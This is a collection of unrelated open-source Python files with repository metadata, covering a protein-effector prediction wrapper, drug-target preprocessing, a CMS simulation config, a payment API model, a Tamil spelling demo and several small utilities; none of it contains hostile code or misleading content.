parts = [s.strip() for s in [id, descr, score, effective]]
out_handle.write("\t".join(parts) + "\n")
count += 1
if float(score) < 0:
errors += 1
if effective.lower() == "true":
positive += 1
return count, positive, errors
def run(cmd):
# Avoid using shell=True when we call subprocess to ensure if the Python
# script is killed, so too is the child process.
try:
child = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except Exception, err:
sys.exit("Error invoking command:\n%s\n\n%s\n" % (" ".join(cmd), err))
# Use .communicate as can get deadlocks with .wait(),
stdout, stderr = child.communicate()
return_code = child.returncode
if return_code or stderr.startswith("Exception in thread"):
cmd_str = " ".join(cmd) # doesn't quote spaces etc
if stderr and stdout:
sys.exit("Return code %i from command:\n%s\n\n%s\n\n%s" % (return_code, cmd_str, stdout, stderr))
else:
sys.exit("Return code %i from command:\n%s\n%s" % (return_code, cmd_str, stderr))
if not os.path.isdir(effective_t3_dir):
sys.exit("Effective T3 folder not found: %r" % effective_t3_dir)
if not os.path.isfile(effective_t3_jar):
sys.exit("Effective T3 JAR file not found: %r" % effective_t3_jar)
if not os.path.isdir(os.path.join(effective_t3_dir, "module")):
sys.exit("Effective T3 module folder not found: %r" % os.path.join(effective_t3_dir, "module"))
effective_t3_model = os.path.join(effective_t3_dir, "module", model)
if not os.path.isfile(effective_t3_model):
sys.stderr.write("Contents of %r is %s\n"
% (os.path.join(effective_t3_dir, "module"),
", ".join(repr(p) for p in os.listdir(os.path.join(effective_t3_dir, "module")))))
sys.stderr.write("Main JAR was found: %r\n" % effective_t3_jar)
sys.exit("Effective T3 model JAR file not found: %r" % effective_t3_model)
# We will have write access whereever the output should be,
temp_file = os.path.abspath(tabular_file + ".tmp")
# Use absolute paths since will change current directory...
tabular_file = os.path.abspath(tabular_file)
fasta_file = os.path.abspath(fasta_file)
cmd = ["java", "-jar", effective_t3_jar,
"-f", fasta_file,
"-m", model,
"-t", threshold,
"-o", temp_file,
"-q"]
try:
# Must run from directory above the module subfolder:
os.chdir(effective_t3_dir)
except Exception:
sys.exit("Could not change to Effective T3 folder: %s" % effective_t3_dir)
run(cmd)
if not os.path.isfile(temp_file):
sys.exit("ERROR - No output file from Effective T3")
out_handle = open(tabular_file, "w")
out_handle.write("#ID\tDescription\tScore\tEffective\n")
data_handle = open(temp_file)
count, positive, errors = clean_tabular(data_handle, out_handle)
data_handle.close()
out_handle.close()
os.remove(temp_file)
if errors:
print("%i sequences, %i positive, %i errors"
% (count, positive, errors))
else:
print("%i/%i sequences positive" % (positive, count))
if count and count == errors:
# Galaxy will still allow them to see the output file
sys.exit("All your sequences gave an error code")
|
[
"p.j.a.cock@googlemail.com"
] |
p.j.a.cock@googlemail.com
|
622607fa7a7c60daa2e8c156f9d58d46032e3a4a
|
f1f21ba2236da38a49a8185ce33b3ce4a4424c1d
|
/apps/drug_target_interaction/moltrans_dti/preprocess.py
|
3919994d6fa4be6c6b1b0d8c44ecb5fd98b3b5e8
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleHelix
|
75a07c2f14475e56e72f4573b2cf82a91d1cbfda
|
e6ab0261eb719c21806bbadfd94001ecfe27de45
|
refs/heads/dev
| 2023-08-05T03:34:55.009355
| 2023-08-01T09:30:44
| 2023-08-01T09:30:44
| 314,704,349
| 771
| 197
|
Apache-2.0
| 2023-08-01T09:15:07
| 2020-11-21T00:53:39
|
Python
|
UTF-8
|
Python
| false
| false
| 5,501
|
py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Data preprocessing
"""
from helper import utils
import paddle
from paddle import io
import os
import numpy as np
import pandas as pd
import codecs
from subword_nmt.apply_bpe import BPE
# Set global variable, drug max position, target max position
D_MAX = 50
T_MAX = 545
drug_vocab_path = './vocabulary/drug_bpe_chembl_freq_100.txt'
drug_codes_bpe = codecs.open(drug_vocab_path)
drug_bpe = BPE(drug_codes_bpe, merges=-1, separator='')
drug_temp = pd.read_csv('./vocabulary/subword_list_chembl_freq_100.csv')
drug_index2word = drug_temp['index'].values
drug_idx = dict(zip(drug_index2word, range(0, len(drug_index2word))))
target_vocab_path = './vocabulary/target_bpe_uniprot_freq_500.txt'
target_codes_bpe = codecs.open(target_vocab_path)
target_bpe = BPE(target_codes_bpe, merges=-1, separator='')
target_temp = pd.read_csv('./vocabulary/subword_list_uniprot_freq_500.csv')
target_index2word = target_temp['index'].values
target_idx = dict(zip(target_index2word, range(0, len(target_index2word))))
def drug_encoder(input_smiles):
"""
Drug Encoder
Args:
input_smiles: input drug sequence.
Returns:
v_d: padded drug sequence.
temp_mask_d: masked drug sequence.
"""
temp_d = drug_bpe.process_line(input_smiles).split()
try:
idx_d = np.asarray([drug_idx[i] for i in temp_d])
except:
idx_d = np.array([0])
flag = len(idx_d)
if flag < D_MAX:
v_d = np.pad(idx_d, (0, D_MAX - flag), 'constant', constant_values=0)
temp_mask_d = [1] * flag + [0] * (D_MAX - flag)
else:
v_d = idx_d[:D_MAX]
temp_mask_d = [1] * D_MAX
return v_d, np.asarray(temp_mask_d)
def target_encoder(input_seq):
"""
Target Encoder
Args:
input_seq: input target sequence.
Returns:
v_t: padded target sequence.
temp_mask_t: masked target sequence.
"""
temp_t = target_bpe.process_line(input_seq).split()
try:
idx_t = np.asarray([target_idx[i] for i in temp_t])
except:
idx_t = np.array([0])
flag = len(idx_t)
if flag < T_MAX:
v_t = np.pad(idx_t, (0, T_MAX - flag), 'constant', constant_values=0)
temp_mask_t = [1] * flag + [0] * (T_MAX - flag)
else:
v_t = idx_t[:T_MAX]
temp_mask_t = [1] * T_MAX
return v_t, np.asarray(temp_mask_t)
def concordance_index1(y, f):
"""
Compute the concordance index (CI)
Args:
y (ndarray): 1-dim ndarray representing the Kd from the ground truth.
f (ndarray): 1-dim ndarray representing the predicted Kd from the model.
Returns:
ci (float): the concordance index.
"""
ind = np.argsort(y)
y = y[ind]
f = f[ind]
i = len(y) - 1
j = i - 1
z = 0.0
S = 0.0
while i > 0:
while j >= 0:
if y[i] > y[j]:
z = z + 1
u = f[i] - f[j]
if u > 0:
S = S + 1
elif u == 0:
S = S + 0.5
j = j - 1
i = i - 1
j = i - 1
ci = S / z
return ci
class DataEncoder(io.Dataset):
"""
Data Encoder
"""
def __init__(self, ids, label, dti_data):
"""
Initialization
"""
super(DataEncoder, self).__init__()
self.ids = ids
self.label = label
self.data = dti_data
def __len__(self):
"""
Get size
"""
return len(self.ids)
def __getitem__(self, idx):
"""
Get embeddings of drug and target, label
"""
idx = self.ids[idx]
d_input = self.data.iloc[idx]['SMILES']
t_input = self.data.iloc[idx]['Target Sequence']
res = []
d_out, mask_d_out = drug_encoder(d_input)
res.append(d_out)
res.append(mask_d_out)
t_out, mask_t_out = target_encoder(t_input)
res.append(t_out)
res.append(mask_t_out)
labels = self.label[idx]
res.append(labels)
return res
class DataEncoderTest(io.Dataset):
"""
Data Encoder for Test
"""
def __init__(self, ids, dti_data):
"""
Initialization
"""
super(DataEncoderTest, self).__init__()
self.ids = ids
self.data = dti_data
def __len__(self):
"""
Get size
"""
return len(self.ids)
def __getitem__(self, idx):
"""
Get embeddings of drug and target
"""
idx = self.ids[idx]
d_input = self.data.iloc[idx]['SMILES']
t_input = self.data.iloc[idx]['Target Sequence']
res = []
d_out, mask_d_out = drug_encoder(d_input)
res.append(d_out)
res.append(mask_d_out)
t_out, mask_t_out = target_encoder(t_input)
res.append(t_out)
res.append(mask_t_out)
return res
|
[
"noreply@github.com"
] |
PaddlePaddle.noreply@github.com
|
bf27c415d0043fd1bc4f0ca0022fb76d57c961a7
|
c73e8286579e7ba673440bac44bd527d416beaef
|
/MyNeutronSimHitAnalyzer/test_myneutronsimhitanalyzer_cfg.py
|
fefea3af0908ab0115fa557d29761f7fc67dfbf8
|
[] |
no_license
|
pietverwilligen/MyAnalyzers
|
6815cec717f2ede3f44070466e33c9b292d5b452
|
ccd04521747625d82a19174ebebb6a2cba53ddf2
|
refs/heads/master
| 2023-05-24T12:42:17.134907
| 2023-05-18T11:55:05
| 2023-05-18T11:55:05
| 16,079,295
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,417
|
py
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("Demo")
process.load("FWCore.MessageService.MessageLogger_cfi")
# process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
# process.load('Configuration.Geometry.GeometryExtended_cff')
# process.load('Configuration.Geometry.GeometryExtendedPostLS1_cff')
# process.load('Configuration.Geometry.GeometryExtended2015Reco_cff')
# process.load('Configuration.Geometry.GeometryExtended2015_cff')
# process.load('Configuration.Geometry.GeometryExtended2023MuonReco_cff')
# process.load('Configuration.Geometry.GeometryExtended2023Muon_cff')
# process.load('Configuration.Geometry.GeometryExtended2023D17Reco_cff')
# process.load('Configuration.Geometry.GeometryExtended2023D17_cff')
# process.load('Configuration.StandardSequences.MagneticField_38T_PostLS1_cff') # ... assume not necessary anymore ...
# process.load('Configuration.Geometry.GeometryExtended2018Reco_cff')
# process.load('Configuration.Geometry.GeometryExtended2018_cff')
process.load('Configuration.Geometry.GeometryExtended2026D99Reco_cff')
process.load('Configuration.Geometry.GeometryExtended2026D99_cff')
# process.load('Geometry.CommonDetUnit.globalTrackingGeometry_cfi')
# process.load("Geometry.MuonNumbering.muonNumberingInitialization_cfi")
process.load("Geometry.RPCGeometry.rpcGeometry_cfi") # ... needed? see if I can get rid of it ...
process.load("Geometry.CSCGeometry.cscGeometry_cfi")
process.load("Geometry.DTGeometry.dtGeometry_cfi")
# process.load("Geometry.GEMGeometry.gemGeometry_cfi") # ... does not exist ...
process.load("Alignment.CommonAlignmentProducer.FakeAlignmentSource_cfi")
# Load Events from python file
# ---------------------------------------------------------------------------------------
# option A
# ---------------------------------------------------------------------------------------
# process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
# readFiles = cms.untracked.vstring()
# secFiles = cms.untracked.vstring()
# source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
# ---------------------------------------------------------------------------------------
# option B
# ---------------------------------------------------------------------------------------
# process.load("MinBias_Phase2_14TeV_TuneCP5_100k_Neutron_XS_2026D99_1E4s")
process.load("Test_MinBias_Phase2_14TeV_TuneCP5_100k_Neutron_XS_2026D99_1E4s")
# ---------------------------------------------------------------------------------------
# option C
# ---------------------------------------------------------------------------------------
# process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1) )
# process.source = cms.Source ("PoolSource",
# fileNames = cms.untracked.vstring('/store/user/piet/NeutronBackground/MinBias_Phase2_14TeV_GEN_SIM_XS_2026D99mod_100k_1E4s_13X_v1/crab_MinBias_Phase2_14TeV_100k_1E4s_XS_13X_v1/230504_162117/0000/step1_228.root'))
# ---------------------------------------------------------------------------------------
process.demo = cms.EDAnalyzer('MyNeutronSimHitAnalyzer',
# ---------
# PdfFileNameBase = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s"),
# RootFileName = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s.root"),
# ---------
# PdfFileNameBase = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s_SH30eV"),
# RootFileName = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s_SH30eV.root"),
# ---------
# PdfFileNameBase = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s_Test"),
# RootFileName = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s_Test.root"),
# ---------
PdfFileNameBase = cms.untracked.string("MyNeutronSimHistograms_Phase2_2026D99_Neutron_XS_1E4s"),
RootFileName = cms.untracked.string("MyNeutronSimHistograms_Phase2_2026D99_Neutron_XS_1E4s.root"),
# ---------
BunchSpacing = cms.untracked.double(25.0),
COMEnergy = cms.untracked.double(13.0),
MaxSimTime = cms.untracked.double(10000000000000.0), # 10000s = 10^13 ns [in ns]
# MaxSimTime = cms.untracked.double(1000000000000.0), # 1000s = 10^12 ns [in ns]
# MaxSimTime = cms.untracked.double(100000000000.0), # 100s = 10^11 ns [in ns]
# MaxSimTime = cms.untracked.double(10000000000.0), # 10s = 10^10 ns [in ns]
# MaxSimTime = cms.untracked.double(100000000.0), # 100ms = 10^8 ns [in ns]
EDepCut30eV = cms.untracked.bool(True),
PhysicsDebug = cms.untracked.bool(True),
TechnicDebug = cms.untracked.bool(True),
)
process.p = cms.Path(process.demo)
|
[
"piet.verwilligen@cern.ch"
] |
piet.verwilligen@cern.ch
|
763c3a099affc2ad5ad0175153483332b443d153
|
d0efa2026b7ed22ff4f9aa76c27ae2474c30f26d
|
/openapi_client/models/location.py
|
f6293ef80984ebfdac4c0af34fa105e138e19331
|
[] |
no_license
|
begum-akbay/Python
|
2075650e0ddbf1c51823ebd749742646bf221603
|
fe8b47e29aae609b7510af2d21e53b8a575857d8
|
refs/heads/master
| 2023-03-28T00:11:00.997194
| 2021-03-25T16:38:17
| 2021-03-25T16:38:17
| 351,499,957
| 0
| 0
| null | 2021-03-25T16:38:17
| 2021-03-25T16:15:16
|
Python
|
UTF-8
|
Python
| false
| false
| 7,016
|
py
|
# coding: utf-8
"""
Payment Gateway API Specification.
The documentation here is designed to provide all of the technical guidance required to consume and integrate with our APIs for payment processing. To learn more about our APIs please visit https://docs.firstdata.com/org/gateway. # noqa: E501
The version of the OpenAPI document: 21.1.0.20210122.001
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class Location(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'location_id': 'str',
'merchant_address': 'FraudAddress',
'hierarchy': 'str',
'timezone_offset': 'str',
'user_defined': 'object'
}
attribute_map = {
'location_id': 'locationId',
'merchant_address': 'merchantAddress',
'hierarchy': 'hierarchy',
'timezone_offset': 'timezoneOffset',
'user_defined': 'userDefined'
}
def __init__(self, location_id=None, merchant_address=None, hierarchy=None, timezone_offset=None, user_defined=None): # noqa: E501
"""Location - a model defined in OpenAPI""" # noqa: E501
self._location_id = None
self._merchant_address = None
self._hierarchy = None
self._timezone_offset = None
self._user_defined = None
self.discriminator = None
if location_id is not None:
self.location_id = location_id
if merchant_address is not None:
self.merchant_address = merchant_address
if hierarchy is not None:
self.hierarchy = hierarchy
if timezone_offset is not None:
self.timezone_offset = timezone_offset
if user_defined is not None:
self.user_defined = user_defined
@property
def location_id(self):
"""Gets the location_id of this Location. # noqa: E501
The unique ID of this location. # noqa: E501
:return: The location_id of this Location. # noqa: E501
:rtype: str
"""
return self._location_id
@location_id.setter
def location_id(self, location_id):
"""Sets the location_id of this Location.
The unique ID of this location. # noqa: E501
:param location_id: The location_id of this Location. # noqa: E501
:type: str
"""
self._location_id = location_id
@property
def merchant_address(self):
"""Gets the merchant_address of this Location. # noqa: E501
:return: The merchant_address of this Location. # noqa: E501
:rtype: FraudAddress
"""
return self._merchant_address
@merchant_address.setter
def merchant_address(self, merchant_address):
"""Sets the merchant_address of this Location.
:param merchant_address: The merchant_address of this Location. # noqa: E501
:type: FraudAddress
"""
self._merchant_address = merchant_address
@property
def hierarchy(self):
"""Gets the hierarchy of this Location. # noqa: E501
Free-text field to describe a hierarchy the merchant would like to provide. # noqa: E501
:return: The hierarchy of this Location. # noqa: E501
:rtype: str
"""
return self._hierarchy
@hierarchy.setter
def hierarchy(self, hierarchy):
"""Sets the hierarchy of this Location.
Free-text field to describe a hierarchy the merchant would like to provide. # noqa: E501
:param hierarchy: The hierarchy of this Location. # noqa: E501
:type: str
"""
self._hierarchy = hierarchy
@property
def timezone_offset(self):
"""Gets the timezone_offset of this Location. # noqa: E501
The timezone offset from UTC to the merchants timezone configuration, specified in the format +hh:mm. # noqa: E501
:return: The timezone_offset of this Location. # noqa: E501
:rtype: str
"""
return self._timezone_offset
@timezone_offset.setter
def timezone_offset(self, timezone_offset):
"""Sets the timezone_offset of this Location.
The timezone offset from UTC to the merchants timezone configuration, specified in the format +hh:mm. # noqa: E501
:param timezone_offset: The timezone_offset of this Location. # noqa: E501
:type: str
"""
self._timezone_offset = timezone_offset
@property
def user_defined(self):
"""Gets the user_defined of this Location. # noqa: E501
A JSON object that can carry any additional information about the location that might be helpful for fraud detection. # noqa: E501
:return: The user_defined of this Location. # noqa: E501
:rtype: object
"""
return self._user_defined
@user_defined.setter
def user_defined(self, user_defined):
"""Sets the user_defined of this Location.
A JSON object that can carry any additional information about the location that might be helpful for fraud detection. # noqa: E501
:param user_defined: The user_defined of this Location. # noqa: E501
:type: object
"""
self._user_defined = user_defined
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Location):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"emargules@bluepay.com"
] |
emargules@bluepay.com
|
ad7e6bc02120ef80805bcd33c41a5689fdc3b3ae
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4327/codes/1685_2471.py
|
3839f412181a0170517221e3c9d2dc2bcfbbf2a6
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109
| 2020-05-23T00:24:26
| 2020-05-23T00:24:26
| 266,199,309
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 361
|
py
|
ida=int(input("idade:"))
imc=float(input("imc:"))
print("Entradas: {} anos e IMC {}".format(ida,imc))
if ((ida<=0 or ida>130) and imc<=0):
print("Dados invalidos")
elif(ida<45 and imc<22):
print("Risco: Baixo")
elif(ida>=45 and imc<22):
print("Risco: Medio")
elif(ida<45 and imc>=22):
print("Risco: Medio")
elif(ida>=45 and imc>=22):
print("Risco: Alto")
|
[
"jvlo@icomp.ufam.edu.br"
] |
jvlo@icomp.ufam.edu.br
|
245ae97ad6a1378e1321ff246b20b6073791fbf7
|
d30855895ee0c6ddaef493039dd0e0f1298eeae6
|
/demo3.py
|
05468c0c352ed93b62578658570a7927fdf16d41
|
[
"GPL-1.0-or-later",
"GPL-3.0-only",
"MIT"
] |
permissive
|
Ezhil-Language-Foundation/open-tamil
|
f5f28463bff4400aa131b4a428e8f3e17aa63997
|
8ea745440f96fe587cf0959d12e990ad7923e60e
|
refs/heads/main
| 2022-12-23T13:50:19.758812
| 2022-12-16T21:56:02
| 2022-12-16T21:56:02
| 14,263,826
| 246
| 72
|
MIT
| 2022-09-24T17:49:10
| 2013-11-09T19:48:48
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 531
|
py
|
# -*- coding: utf-8 -*-
## (C) 2019 Muthiah Annamalai,
## This module is part of solthiruthi project under open-tamil umbrella.
## This code maybe used/distributed under MIT LICENSE.
from solthiruthi.dictionary import DictionaryBuilder, TamilVU
from solthiruthi.tamil99kbd import inv_confusion_matrix as kbd_cm
from solthiruthi.typographical import corrections
TVU, _ = DictionaryBuilder.create(TamilVU)
wl = corrections("அன்பம்", TVU, kbd_cm, ed=2)
for c in wl:
print(("u'%s'," % c))
print(("L = %d" % len(wl)))
|
[
"ezhillang@gmail.com"
] |
ezhillang@gmail.com
|
dc8c9b4ea75f3e8b25d8678b445eb24ee988d0e3
|
c03c8d7363a3626b1178d241af3aa93a7b0b15e2
|
/unidesign/transients/__init__.py
|
3d50473e4a0abd9fdb247dd1784c2cc73cd211c5
|
[] |
no_license
|
luntan365/unidesign
|
0c9aa82df215fcff6be32840709ea51588cad805
|
ee24a7152d937d1b95c2bb67b3f050966850d50f
|
refs/heads/master
| 2020-12-01T07:50:18.444676
| 2011-09-11T10:54:41
| 2011-09-11T10:54:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,236
|
py
|
"""
Transient Dynamics for Neural Processing
Building Blocks
- Network N for the neuroanatomy with nodes representing neurons and edges representing connection weight
- A set of input pattern I extended in time, representing a spatio-temporal entity, thought of as the
activation of a subset of neurons that would be activated by the sensory signal transduction
- Mapping of e.g. odor identity and concentration to activation pattern I
Experimental physiological data
- Activity patterns, spike time events on the network nodes
Temporal Propagation Function (model)
- Fitting experimental activity pattern evolution given input pattern and anatomical connectivity
- Generate transients T using the fitted model for given input patterns
Algorithm:
- Extract the stable heteroclinic channels, i.e. the metastable saddle states
- Implement the Lotka-Voltera equation as model to generate the transients using ne
http://www.scipy.org/Cookbook/LoktaVolterraTutorial?action=show&redirect=LoktaVolterraTutorial
Try:
- extract from space-time object objects with a sliding time-window approach
existing only in a topological space (no distances), using open sets to define nearness
and use it for clustering into metastable states.
"""
|
[
"git@unidesign.ch"
] |
git@unidesign.ch
|
523a6572bc48a5326a93e982133be5b30218128c
|
acf8fe77e599f8372adf4fc971012394715795d6
|
/flask/EGG-INFO/enstaller/post_egginst.py
|
e91b753a7dca7f316b1ea217b327a33c095849ad
|
[] |
no_license
|
shaheershantk/Blog-Engine-Using-Flask
|
3e2f1457a59f282c336bbb63ff48171f938f5108
|
450e76a8bde0bd702d995fa7bb746ed920917f98
|
refs/heads/master
| 2021-01-01T19:42:03.401554
| 2014-11-10T15:01:08
| 2014-11-10T15:01:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,380
|
py
|
"""
converts the old "__egginst__.txt" files to "egginst.json"
and "_info.json" files
"""
import os
import re
import sys
import json
import time
from os.path import abspath, isdir, isfile, join
def read_old(path):
d1 = {'installed_size': -1}
execfile(path, d1)
d2 = {}
for name in ['egg_name', 'prefix', 'installed_size', 'rel_files']:
d2[name] = d1[name]
return d2
def write_egginst(path, d):
d['files'] = []
for f in d['rel_files'] + [path]:
p = abspath(join(sys.prefix, f))
d['files'].append(p.replace(sys.prefix, '.').replace('\\', '/')
if p.startswith(sys.prefix) else p)
del d['rel_files']
d['prefix'] = sys.prefix
with open(path, 'w') as f:
json.dump(d, f, indent=2, sort_keys=True)
egg_pat = re.compile(r'([\w.]+)-([\w.]+)-(\d+)\.egg$')
def write_info(path, eggname):
m = egg_pat.match(eggname)
if m is None:
return
n, v, b = m.group(1), m.group(2), int(m.group(3))
info = dict(
key = eggname,
name = n.lower(),
version = v,
build = b,
ctime = time.ctime(),
hook = False,
)
with open(path, 'w') as f:
json.dump(info, f, indent=2, sort_keys=True)
def get_eggname():
from enstaller import __version__
return 'enstaller-%s-1.egg' % __version__
def main():
egg_info_dir = join(sys.prefix, 'EGG-INFO')
for fn in os.listdir(egg_info_dir):
meta_dir = join(egg_info_dir, fn)
if not isdir(meta_dir):
continue
path1 = join(meta_dir, '__egginst__.txt')
if not isfile(path1):
continue
path2 = join(meta_dir, 'egginst.json')
path3 = join(meta_dir, '_info.json')
if isfile(path2) and isfile(path3):
continue
data = read_old(path1)
write_egginst(path2, data)
write_info(path3, data['egg_name'])
# create files for enstaller itself if necessary
meta_dir = join(egg_info_dir, 'enstaller')
path2 = join(meta_dir, 'egginst.json')
if not isfile(path2):
write_egginst(path2, dict(
egg_name=get_eggname(), prefix=sys.prefix,
installed_size=-1, rel_files=[]))
path3 = join(meta_dir, '_info.json')
if not isfile(path3):
write_info(path3, get_eggname())
if __name__ == '__main__':
main()
|
[
"shaheer.shan@gmail.com"
] |
shaheer.shan@gmail.com
|
a41def6a23f404b4cc471342fface1cd38551c6b
|
bbd65a48e9fb340b29f39082483680969d6e2571
|
/python/misc/double_letters.py
|
3c887a4d9ac46b613773398829e3c96f93bf0139
|
[
"MIT"
] |
permissive
|
christopher-burke/warmups
|
2784eef3b959bca5c270b3e642b505f3b4c0b790
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
refs/heads/master
| 2022-05-24T11:26:40.046650
| 2022-03-28T16:47:16
| 2022-03-28T16:47:16
| 152,440,792
| 0
| 0
|
MIT
| 2022-03-13T03:25:43
| 2018-10-10T14:51:43
|
Python
|
UTF-8
|
Python
| false
| false
| 712
|
py
|
#!/usr/bin/env python3
"""Double Letters.
Create a function that takes a word and returns true if the word
as two consecutive identical letters.
Source:
https://edabit.com/challenge/q3JMk2yqXfNyHWE9c
"""
import re
def double_letters(text: str) -> bool:
"""Determine if text contains two consecutive identical letters.
Uses `re` module to search for a text.
"""
if re.search(r"(\w)\1+", text):
return True
return False
def main():
"""Run sample double_letters functions. Do not import."""
print(double_letters("loop"))
print(double_letters("yummy"))
print(double_letters("orange"))
print(double_letters("munchkin"))
if __name__ == "__main__":
main()
|
[
"christopherjamesburke@gmail.com"
] |
christopherjamesburke@gmail.com
|
75ad74f6d506bc120e99ee767e0028402f3c0bfa
|
786027545626c24486753351d6e19093b261cd7d
|
/ghidra9.2.1_pyi/ghidra/app/util/bin/format/elf/ElfStringTable.pyi
|
eb2f888abcb4090c19e2aa10f46f1b875549534a
|
[
"MIT"
] |
permissive
|
kohnakagawa/ghidra_scripts
|
51cede1874ef2b1fed901b802316449b4bf25661
|
5afed1234a7266c0624ec445133280993077c376
|
refs/heads/main
| 2023-03-25T08:25:16.842142
| 2021-03-18T13:31:40
| 2021-03-18T13:31:40
| 338,577,905
| 14
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,508
|
pyi
|
import ghidra.app.util.bin
import ghidra.app.util.bin.format
import ghidra.app.util.bin.format.elf
import ghidra.program.model.data
import java.lang
class ElfStringTable(object, ghidra.app.util.bin.format.elf.ElfFileSection):
ASCII: ghidra.program.model.data.DataType = char
BYTE: ghidra.program.model.data.DataType = byte
DWORD: ghidra.program.model.data.DataType = dword
IBO32: ghidra.program.model.data.DataType = ImageBaseOffset32
POINTER: ghidra.program.model.data.DataType = pointer
QWORD: ghidra.program.model.data.DataType = qword
STRING: ghidra.program.model.data.DataType = string
UTF16: ghidra.program.model.data.DataType = unicode
UTF8: ghidra.program.model.data.DataType = string-utf8
VOID: ghidra.program.model.data.DataType = void
WORD: ghidra.program.model.data.DataType = word
def __init__(self):
"""
DO NOT USE THIS CONSTRUCTOR, USE create*(GenericFactory ...) FACTORY METHODS INSTEAD.
"""
...
@staticmethod
def createElfStringTable(reader: ghidra.app.util.bin.format.FactoryBundledWithBinaryReader, header: ghidra.app.util.bin.format.elf.ElfHeader, stringTableSection: ghidra.app.util.bin.format.elf.ElfSectionHeader, fileOffset: long, addrOffset: long, length: long) -> ghidra.app.util.bin.format.elf.ElfStringTable:
"""
Create and parse an Elf string table
@param reader the binary reader containing the elf string table
@param header elf header
@param stringTableSection string table section header or null if associated with a dynamic table entry
@param fileOffset symbol table file offset
@param addrOffset memory address of symbol table (should already be adjusted for prelink)
@param length length of symbol table in bytes of -1 if unknown
@return Elf string table object
@throws IOException
"""
...
def equals(self, __a0: object) -> bool: ...
def getAddressOffset(self) -> long: ...
def getClass(self) -> java.lang.Class: ...
def getEntrySize(self) -> int: ...
def getFileOffset(self) -> long: ...
def getLength(self) -> long: ...
def getTableSectionHeader(self) -> ghidra.app.util.bin.format.elf.ElfSectionHeader:
"""
Get section header which corresponds to this table, or null
if only associated with a dynamic table entry
@return string table section header or null
"""
...
def hashCode(self) -> int: ...
def notify(self) -> None: ...
def notifyAll(self) -> None: ...
def readString(self, reader: ghidra.app.util.bin.BinaryReader, stringOffset: long) -> unicode:
"""
Read string from table at specified relative table offset
@param reader
@param stringOffset table relative string offset
@return string or null on error
"""
...
def toDataType(self) -> ghidra.program.model.data.DataType: ...
def toString(self) -> unicode: ...
@overload
def wait(self) -> None: ...
@overload
def wait(self, __a0: long) -> None: ...
@overload
def wait(self, __a0: long, __a1: int) -> None: ...
@property
def addressOffset(self) -> long: ...
@property
def entrySize(self) -> int: ...
@property
def fileOffset(self) -> long: ...
@property
def length(self) -> long: ...
@property
def tableSectionHeader(self) -> ghidra.app.util.bin.format.elf.ElfSectionHeader: ...
|
[
"tsunekou1019@gmail.com"
] |
tsunekou1019@gmail.com
|
b082b3c7ad5a4453378668650eaa7575368881ca
|
bbbc0e8660cf32334ff5156d974c59e9936b5fa2
|
/aliyun-python-sdk-workbench-inner/aliyunsdkworkbench_inner/request/v20210121/InnerGetSolutionRequest.py
|
d5c15d8ea09248a0672e2c3c739550bddb972c1d
|
[
"Apache-2.0"
] |
permissive
|
stevenQiang/aliyun-openapi-python-sdk
|
a201062ec1df0df44e4f540e1ae11ef35ce5eb12
|
a7e33abb4af88674be42d45db821a173c3a9dc60
|
refs/heads/master
| 2023-06-21T07:29:18.142415
| 2021-07-13T07:52:54
| 2021-07-13T07:52:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,514
|
py
|
